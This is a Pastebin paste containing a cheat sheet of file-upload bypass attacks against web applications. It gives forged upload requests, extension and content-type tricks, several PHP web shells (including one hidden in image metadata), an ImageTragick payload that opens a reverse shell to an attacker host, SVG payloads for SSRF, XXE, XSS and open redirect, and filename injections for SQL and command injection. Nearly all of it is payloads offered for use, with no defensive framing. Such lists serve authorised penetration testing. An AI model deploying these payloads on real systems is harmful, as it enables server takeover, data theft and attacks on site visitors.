API tools faq
paste
Advertisement
b3gund4L

Untitled

b3gund4L
Mar 5th, 2024
1,262
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 7.86 KB | None | 0 0
raw download clone embed print report
  1. 1. Change the `Content-Type` value
  2. ```
  3. POST /images/upload/ HTTP/1.1
  4. Host: target.com
  5. ...
  6.  
  7. ---------------------------829348923824
  8. Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
  9. Content-Type: application/x-php
  10. ```
  11. Change the Content-Type
  12. ```
  13. POST /images/upload/ HTTP/1.1
  14. Host: target.com
  15. ...
  16.  
  17. ---------------------------829348923824
  18. Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
  19. Content-Type: image/jpeg
  20. ```
  21.  
  22. 2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
  23. ```
  24. POST /images/upload/ HTTP/1.1
  25. Host: target.com
  26. ...
  27.  
  28. ---------------------------829348923824
  29. Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
  30. Content-Type: application/x-php
  31. ```
  32. Change the request to this
  33. ```
  34. POST /images/upload/ HTTP/1.1
  35. Host: target.com
  36. ...
  37.  
  38. ---------------------------829348923824
  39. Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
  40. Content-Type: application/x-php
  41. ```
  42.  
  43. 3. Upload the payload, but start with GIF89a; and
  44. ```
  45. POST /images/upload/ HTTP/1.1
  46. Host: target.com
  47. ...
  48.  
  49. ---------------------------829348923824
  50. Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
  51. Content-Type: image/gif
  52.  
  53. GIF89a; <?php system("id") ?>
  54. ```
  55. And dont forget to change the content-type to image/gif
  56.  
  57. 4. Bypass content length validation, it can be bypassed using small payload
  58. ```
  59. (<?=`$_GET[x]`?>)
  60. ```
  61.  
  62. 5. Using null byte in filename
  63. ```
  64. file.php%00.gif
  65. ```
  66.  
  67. 6. Using double extensions for the uploaded file
  68. ```
  69. file.jpg.php
  70. ```
  71.  
  72. 7.  Uploading an unpopular php extensions (php4,php5,php6,phtml)
  73. ```
  74. file.php5
  75. ```
  76.  
  77. 8. Try to randomly capitalizes the file extension
  78. ```
  79. file.pHP5
  80. ```
  81.  
  82. 9. Mix the tips!
  83.  
  84.  
  85. - Upload Function
  86.     - Extensions Impact
  87.         - `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE
  88.         - `SVG`: Stored XSS, SSRF, XXE
  89.         - `GIF`: Stored XSS, SSRF
  90.         - `CSV`: CSV injection
  91.         - `XML`: XXE
  92.         - `AVI`: LFI, SSRF
  93.         - `HTML`, `JS` : HTML injection, XSS, Open redirect
  94.         - `PNG`, `JPEG`: Pixel flood attack (DoS)
  95.         - `ZIP`: RCE via LFI, DoS
  96.         - `PDF`, `PPTX`: SSRF, BLIND XXE
  97.     - Blacklisting Bypass
  98.         - PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc`
  99.         - ASP → `asp`, `.aspx`, `.cer`, `.asa`
  100.         - Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
  101.         - Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm`
  102.         - Using random capitalization → `.pHp`, `.pHP5`, `.PhAr`
  103.     - Whitelisting Bypass
  104.         - `file.jpg.php`
  105.         - `file.php.jpg`
  106.         - `file.php.blah123jpg`
  107.         - `file.php%00.jpg`
  108.         - `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00.
  109.         - `file.php%00`
  110.         - `file.php%20`
  111.         - `file.php%0d%0a.jpg`
  112.         - `file.php.....`
  113.         - `file.php/`
  114.         - `file.php.\`
  115.         - `file.php#.png`
  116.         - `file.`
  117.         - `.html`
  118.     - Vulnerabilities
  119.         - [ ]  Directory Traversal
  120.             - Set filename `../../etc/passwd/logo.png`
  121.             - Set filename `../../../logo.png` as it might changed the website logo.
  122.         - [ ]  SQL Injection
  123.             - Set filename `'sleep(10).jpg`.
  124.             - Set filename `sleep(10)-- -.jpg`.
  125.         - [ ]  Command Injection
  126.             - Set filename `; sleep 10;`
  127.         - [ ]  SSRF
  128.             - Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor.
  129.             - SSRF Through `.svg` file.
  130.  
  131.             ```php
  132.             <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="https://attacker.com/picture.jpg" /></svg>
  133.             ```
  134.  
  135.         - [ ]  ImageTragic
  136.  
  137.             ```
  138.             push graphic-context
  139.             viewbox 0 0 640 480
  140.             fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
  141.             pop graphic-context
  142.             ```
  143.  
  144.         - [ ]  XXE
  145.             - Upload using `.svg` file
  146.  
  147.             ```xml
  148.             <?xml version="1.0" standalone="yes"?>
  149.             <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
  150.             <svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  151.                <text font-size="40" x="0" y="16">&xxe;</text>
  152.             </svg>
  153.             ```
  154.  
  155.             ```xml
  156.             <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
  157.                 <image xlink:href="expect://ls"></image>
  158.             </svg>
  159.             ```
  160.  
  161.             - Using excel file
  162.         - [ ]  XSS
  163.             - Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg<svg onload=confirm()>"`
  164.             - Upload using `.gif` file
  165.  
  166.             ```
  167.             GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
  168.             ```
  169.  
  170.             - Upload using `.svg` file
  171.  
  172.             ```xml
  173.             <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
  174.             ```
  175.  
  176.             ```xml
  177.             <?xml version="1.0" standalone="no"?>
  178.             <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  179.  
  180.             <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  181.                <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  182.                <script type="text/javascript">
  183.                   alert("HolyBugx XSS");
  184.                </script>
  185.             </svg>
  186.             ```
  187.  
  188.         - [ ]  Open Redirect
  189.             1. Upload using `.svg` file
  190.  
  191.             ```xml
  192.             <code>
  193.             <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  194.             <svg
  195.             onload="window.location='https://attacker.com'"
  196.             xmlns="http://www.w3.org/2000/svg">
  197.             <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  198.             </svg>
  199.             </code>
  200.             ```
  201.  
  202.     - Content-ish Bypass
  203.         - [ ]  Content-type validation
  204.             - Upload `file.php` and change the `Content-type: application/x-php` or `Content-Type : application/octet-stream`
  205.             to `Content-type: image/png` or `Content-type: image/gif` or `Content-type: image/jpg`.
  206.         - [ ]  Content-Length validation
  207.             - Small PHP Shell
  208.  
  209.             ```php
  210.             (<?=`$_GET[x]`?>)
  211.             ```
  212.  
  213.         - [ ]  Content Bypass Shell
  214.             - If they check the Content. Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` )
  215.  
  216.             ```php
  217.             GIF89a; <?php system($_GET['cmd']); ?>
  218.             ```
  219.  
  220.     - Misc
  221.         - [ ]  Uploading `file.js` & `file.config` (web.config)
  222.         - [ ]  Pixel flood attack using image
  223.         - [ ]  DoS with a large values name: `1234...99.png`
  224.         - [ ]  Zip Slip
  225.             - If a site accepts `.zip` file, upload `.php` and compress it into `.zip` and upload it. Now visit, `site.com/path?page=zip://path/file.zip%23rce.php`
  226.         - [ ]  Image Shell
  227.             - Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file `mv pic.jpg pic.php.jpg`
  228.  
  229.             ```php
  230.             exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' pic.jpg
  231.             ```
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!